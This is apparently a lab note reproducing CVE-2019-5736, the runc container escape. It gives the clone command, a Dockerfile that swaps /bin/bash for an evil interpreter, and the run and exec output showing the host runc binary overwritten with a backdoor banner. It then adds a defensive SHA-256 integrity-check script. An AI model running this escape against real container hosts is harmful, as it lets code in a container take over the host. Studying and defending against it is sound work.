Reference information:
https://github.com/q3k/cve-2019-5736-poc
https://www.cvedetails.com/cve/CVE-2019-5736/
https://github.com/twistlock/RunC-CVE-2019-5736
https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/containerd.io_1.2.0-1_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce_18.09.0~3-0~debian-buster_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb
Test environment:
Ubuntu 18.04 (4.15.0-20-generic)
Affected runc: 1.0.0-rc6 and earlier
Affected Docker: < 18.09.2
Precondition: the container process runs as root without user-namespace remapping, because the final step writes to the host's runc binary and needs write permission on it; with Docker's userns-remap (host root not mapped into the container) this PoC fails.
Test steps:
# cd
# git clone https://github.com/twistlock/RunC-CVE-2019-5736
# cd RunC-CVE-2019-5736/exec_POC
# vim Dockerfile
FROM ubuntu:18.04
COPY replace.sh /
RUN ["chmod", "+x", "/replace.sh"]
COPY overwrite_runc /overwrite_runc
RUN ["chmod", "+x", "/overwrite_runc"]
COPY new_runc /
RUN ["mv", "/bin/bash", "/bin/bash_original"]
COPY bash_evil /bin/bash
RUN ["chmod", "+x", "/bin/bash"]
ENTRYPOINT ["/bin/bash_original", "/replace.sh"]
# docker build -t cve .
# docker run --rm --name test cve
[+] Waiting for runC to be executed in the container...
Open a second terminal window and exec into the running container:
# docker exec test bash
No help topic for '/bin/bash'
That message is printed by runC itself, not by bash: the image replaced /bin/bash with bash_evil, whose interpreter line points at /proc/self/exe, so the kernel re-executes the runC binary with '/bin/bash' as its argument. While that runC process exists inside the container, replace.sh in the first window can open its binary through /proc/<pid>/exe, which is exactly what the next output shows.
Done.
Back in the first window, the `docker run --rm --name test cve` command started earlier has now finished. Its complete output is:
[+] Waiting for runC to be executed in the container...
[+] Got /proc/1071/exe as fd 3 in this process
[+] Opened runC (using /proc/self/fd/3) for writing
[+] Succesfully overwritten runC
[+] Done, shuting down ...
# runc -v
**THE ALL NEW AND IMPROVED RUNC**
[+] Your backdoor here ->
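The last step above proves the escape by running the host's runc, which is the one thing an operator should not do once it may have been overwritten. As an added check (example code, not part of the original notes or of the twistlock PoC), the following script records a SHA-256 baseline of the host runc binary on a known-good host and later verifies it by reading the file, never executing it; it also flags a runc that no longer starts with the ELF magic, since the packaged binary is a static ELF. The path /usr/bin/runc and the baseline file location are assumptions; the sample "binary" and the tampered contents in demo are constructed stand-ins written to a temporary directory so the script runs offline.

```shell
#!/bin/sh
# Added integrity check for the host runC binary (example code, not part of the
# original notes or of the twistlock PoC). Assumption: runC lives at RUNC_PATH
# (default /usr/bin/runc); the baseline file path is chosen by the operator.

RUNC_PATH=${RUNC_PATH:-/usr/bin/runc}

# file_sha256 FILE: print the hex SHA-256 of FILE (coreutils or BSD tooling).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# is_elf FILE: succeed when FILE begins with the ELF magic bytes 7f 45 4c 46.
# A packaged runc is a static ELF; a "runc" that has turned into a script is not it.
is_elf() {
    [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# record_baseline BIN BASELINE: store the hash in sha256sum's "HASH  PATH" form.
# Take it on a known-good host right after the package is installed.
record_baseline() {
    printf '%s  %s\n' "$(file_sha256 "$1")" "$1" > "$2"
}

# verify_baseline BIN BASELINE: succeed if BIN still matches the recorded hash.
# Only reads BIN; it never executes it, since BIN may now be the backdoor.
verify_baseline() {
    expected=$(cut -d' ' -f1 "$2")
    actual=$(file_sha256 "$1")
    if [ "$expected" = "$actual" ]; then
        return 0
    fi
    printf 'TAMPERED: %s sha256=%s baseline=%s\n' "$1" "$actual" "$expected" >&2
    return 1
}

# demo: constructed stand-in files in a temp directory, so this runs offline.
# Prints four exit codes: verify before, is_elf before, verify after, is_elf after.
demo() {
    tmp=$(mktemp -d)
    # Constructed "good" binary: ELF magic followed by filler bytes.
    printf '\177ELF%s' 'constructed-runc-body' > "$tmp/runc"
    record_baseline "$tmp/runc" "$tmp/runc.sha256"
    if verify_baseline "$tmp/runc" "$tmp/runc.sha256"; then v1=0; else v1=1; fi
    if is_elf "$tmp/runc"; then e1=0; else e1=1; fi
    # Simulate the PoC's overwrite: rewrite the contents in place (same inode),
    # which is what a write through /proc/self/fd/N to the runC fd does.
    printf '#!/bin/sh\necho "**THE ALL NEW AND IMPROVED RUNC**"\n' > "$tmp/runc"
    if verify_baseline "$tmp/runc" "$tmp/runc.sha256" 2>/dev/null; then v2=0; else v2=1; fi
    if is_elf "$tmp/runc"; then e2=0; else e2=1; fi
    rm -rf "$tmp"
    echo "$v1 $e1 $v2 $e2"
}

# Usage: ./runc-check.sh record BASELINE | verify BASELINE | demo
case "${1:-}" in
    record) record_baseline "$RUNC_PATH" "$2" ;;
    verify) verify_baseline "$RUNC_PATH" "$2" ;;
    demo)   demo ;;
esac
```

On a real host, run `record` once after installing the packages listed above and `verify` from cron or a configuration-management check; if runc came from the containerd.io package, `dpkg -V containerd.io` is a quick alternative that compares against the package's recorded checksums. Note that this only detects a tamper after the fact: the actual fix in Docker 18.09.2 (runc with the CVE-2019-5736 patch) makes runC re-execute from a sealed in-memory copy of itself, so /proc/<pid>/exe of the runC process no longer refers to the on-disk binary and the overwrite in the output above cannot happen.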